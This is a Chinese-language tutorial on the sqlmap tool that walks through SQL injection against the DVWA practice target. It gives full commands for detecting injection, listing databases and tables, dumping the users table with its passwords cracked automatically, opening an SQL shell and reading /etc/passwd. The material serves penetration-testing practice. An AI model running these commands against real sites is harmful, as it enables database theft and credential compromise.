sqlmap 是一种开源渗透测试工具，可自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、许多适用于最终渗透测试人员的利基功能，以及广泛的开关，包括数据库指纹、从数据库获取数据、访问底层文件系统以及通过输出在操作系统上执行命令。

来自 Github

项目地址 https://github.com/sqlmapproject/sqlmap

下载即可使用，需要安装 python

一些基础用法

这里使用常用漏洞靶场 dvwa 作为演示

检测是否存在注入

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#"

-u 指定要检测的 url，sqlmap 就会自动检测尝试可注入的参数

也可以添加 -p 指定参数，这里为 -p "id"

完整命令为

 sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id"

由于 dvwa 需要登录，所以还需要指定 cookie，需要添加 --cookie

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#"  -p "id" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low"

执行，提示 id 存在 sql 注入，并显示了注入的 payload。

获取数据库信息

上一步得出存在注入，那么便可以更进一步，获取更多信息了。比如获取该网站当前使用的数据库名，使用如下命令。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --current-db

--batch 表示默认全部确定，这样就不会出现确认提示

--current-db 表示获取当前数据库名

可以看到很快就获取到了，当前数据库名为 dvwa

继续列出所有数据库。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --dbs

--dbs 列出所有数据库

一共有两个数据库。

获取表以及表中的数据

获取到数据库信息之后，进一步获取数据表信息，以及数据。

枚举指定数据库中所有的表。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch -D "dvwa" --tables

-D 指定数据库，后接数据库名

--tables 列出所有表

一共获取到两张表。

枚举指定表的所有数据。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch -D "dvwa" -T "users" --dump

获取到 users 表的数据，并且 sqlmap 帮我们自动解密了密码。

执行 sql 语句以及读取文件

我们也可以执行一些自定义的 sql 语句。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --sql-shell

上面语句执行后，将会打开一个 sql shell，供我们执行 sql 命令。

还可以直接读取文件，例如读取 /etc/passwd。

sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0q2n2t8jccdulkn6rssl553rg2; security=low" --batch --file-read "/etc/passwd"

--file-read 表示读取文件，参数为文件绝对路径

显示文件读取成功，被保存到本地。

打开该文件即可看到读取下来的内容。

以上就是 sql 常见用法了。